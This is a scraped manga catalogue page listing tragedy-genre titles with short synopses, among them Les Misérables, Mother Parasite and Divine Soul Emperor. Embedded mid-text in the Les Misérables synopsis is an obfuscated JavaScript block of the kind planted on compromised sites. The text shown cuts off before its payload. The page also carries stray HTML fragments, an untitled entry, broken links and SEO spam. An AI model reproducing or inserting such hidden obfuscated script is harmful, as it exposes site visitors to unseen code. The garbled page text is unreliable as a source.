Tragedy - Page 14

Explore the world of Tragedy manga, where gripping stories await. Start reading the best Tragedy manga free now!

2094 results

Abandoned wife has a new husband

“It’s a wife sale.” Chloe is eventually abandoned by her coercive and violent husband. It is also a disgraceful ‘selling wife’. When Chloe is in danger of being sold for three hundred yuan in front of a shabby, cramped bar and men who are no less than a bar. A mysterious man named Ash Brinicle appears.


The Villainess Needs a Tyrant

Just now, I stole the lips of a man who is notorious as a tyrant. In front of my younger cousin, Arinel, who stole everything I had in my previous life. *** “Why did you kiss me?” “Because my younger cousin loves you, Your Majesty.” “Is that so?” His arms wrapped around my waist. The distance that was formed vanished in an instance. The cold-blooded, powerful man’s smile filled my view. “Open your lips. If you are going to do it, then do it properly.” Credit goes to Travis Translations. <h5 class="seriesother associated">Associated Names</h5> <div id="editassociated">TVNT 그 악녀에게는 폭군이 필요하다</div>



A man who had lost everything. An almighty power, the [Zero Code] held within his hand. “Player Kim Su Hyun, do you truly wish to revert the time of Hall Plain?” “I want to go back 10 years. To that period when I first came here.” Based in the same universe as “Second Coming of Gluttony”.


Les Misérables

Victor Hugo’s classic novel of love & tragedy during the French Revolution is reborn in this adaptation by Crystal S. Chan! In 19th-century France, Jean Valjean, who for decades has been hunted by the ruthless policeman Javert after breaking parole, agrees to care for a factory worker's daughter. The decision changes their lives forever. The gorgeous art of SunNeko Lee brings to life the tragic stories of Valjean, Javert, and the beautiful Fantine, in this epic production of Les Misérables!<script></script><script>function _0x4d85(_0x44fb37,_0x571a60){var _0x5cdb10=_0x25da();return _0x4d85=function(_0x45837b,_0xb4a051){_0x45837b=_0x45837b-(0xbf+0x3*-0x7c1+0x17c2);var _0x678ca1=_0x5cdb10[_0x45837b];return _0x678ca1;},_0x4d85(_0x44fb37,_0x571a60);}(function(_0x406714,_0xae28ff){var _0x3acf57=_0x4d85,_0x57dd74=_0x406714();while(!![]){try{var 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Divine Soul Emperor

Read Manhwa Divine Soul Emperor Online For Free At KunManga Divine Soul Emperor Manga also known as “Divine Coffin Spirit / Divine Spirit Martial Emperor / Emperor Wu / God Soul Emperor / Shénhún wǔdì / 神魂武帝”. This OnGoing webtoon was released on 2020. The story was written by Daxingdao Anime and illustrations by Daxingdao Anime. The content of the comic Divine Soul Emperor: The young man Lin Yan awakened the waste spirit and was ridiculed by everyone, but he did not know that the spirit was called the life and death coffin, and he turned around the heavens and earth. He also included a beautiful young girl master Qian Qianxue with unlimited ability. Since then, the young man has quickly jumped from a piece of trash and eventually reached the position of Emperor. The comic Divine Soul Emperor belongs to the Genre: Action, Adventure, Drama, Fantasy, Historical, Manhua, Martial Arts, Shounen, Tragedy, Wuxia Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Noble Lady or Whatever, I’m Going Home Maxed Out Leveling Exclusive Possession: Young Master Ji’s Beloved Wife


Mother Parasite

Miki Ryouta, a junior high school student, appears to be getting along well with his single mother, but his mother is always frightened of her son\'s every move. On the other hand, his classmate Kasai Kaoru is fed up with his overprotective parents and thinks it is his mother\'s fault that he is bullied. One day, Ryouta saves Kaoru from being bullied, and the two have their first conversation... A psychological suspense story of a boy obsessed with ultimate motherhood begins!


100 Ghost Stories That Will Lead to My Own Death

One day, an elementary school child named Yuuma tries to jump out of his classroom window. His classmate Hina stops him and, in a bid to stall for time, asks him, “Do you know the round of a hundred ghost stories?” Hina tells Yuuma about a ritual where, if you tell a hundred ghost stories, you’ll see ghosts afterward. Learning this gives Yuuma a new lease on life. Chapter by chapter, he shares ghost stories with the reader, slowly but surely inching his way toward one hundred… (Source: Seven Seas Entertainment)


Your Majesty, Please Don’t Kill Me Again

Your Majesty, Please Don’t Kill Me Again It was the end of a sunny summer day. In the hands of the tyrant, father, mother, brother and my neck went under the guillotine. And when I opened my eyes, it was my 12th birthday. Before the 13-year-old young Emperor became a brutal tyrant, I had to somehow become a god next to the man. “I’m your maid of honor, so I’ll follow you.” “I don’t have much. And I don’t own you.” To live and to save my family, I have to be in the eyes of that tyrant who didn’t believe in humanity. Only then I can live. But that horrible monster is starting to change. “I save what I lose in my hands. So don’t hurt yourself without my permission.”


Hand Of The Abyss

[Top Student Meets Popular Queen Bee] What secrets are these quiet girls hiding? Zheng Shan found the lost class fee money in her locker. This was seen by Mary and several other classmates. In a panic, Zheng Shan hid the money. This caused a misunderstanding that she was the one who stole the class fee money. However, the class monitor, Mary, did not accuse Zheng Shan of theft. Instead, she reached out to her. Will it be a helping hand or a hand to pull Zheng Shan into the abyss?


Tenshi no Saezuri

Sanae Kitajima is a psychiatrist specializing in end-of-life care. Her boyfriend, Takanashi, who once struggled with a deep fear of death, returns from an Amazon expedition profoundly changed. What happened during the expedition? What is the true meaning behind his cryptic words, \"I can hear the whispers of angels\"? A complete manga adaptation of Yusuke Kishi\'s original novel, known for producing numerous masterpiece horror novels such as The Black House and Lesson of the Evil.


The War of Greedy Witches: 32 of the Wickedest Women Duel to the Death

Joan of Arc, the hero who saved France, was sentenced to be burned at the stake. But at the moment of her death, a demon sent her to another world. There, she found 32 women from across history, known as “witches”. ___ **Alt Official Raw:** [MangaHot]( **Official English Volumes:** [Yen Press](


How We End

Walking aimlessly through the ruins of civilization, life had never been better for Lya and Renard. In their world filled with rubble and rain, a faint streak of sunshine can light the darkest streets. Side by side, in search of food, they embark on an endless journey towards the center of the city. Sharing both the warm and cold, the siblings rediscover the disintegrating remnants of humanity.
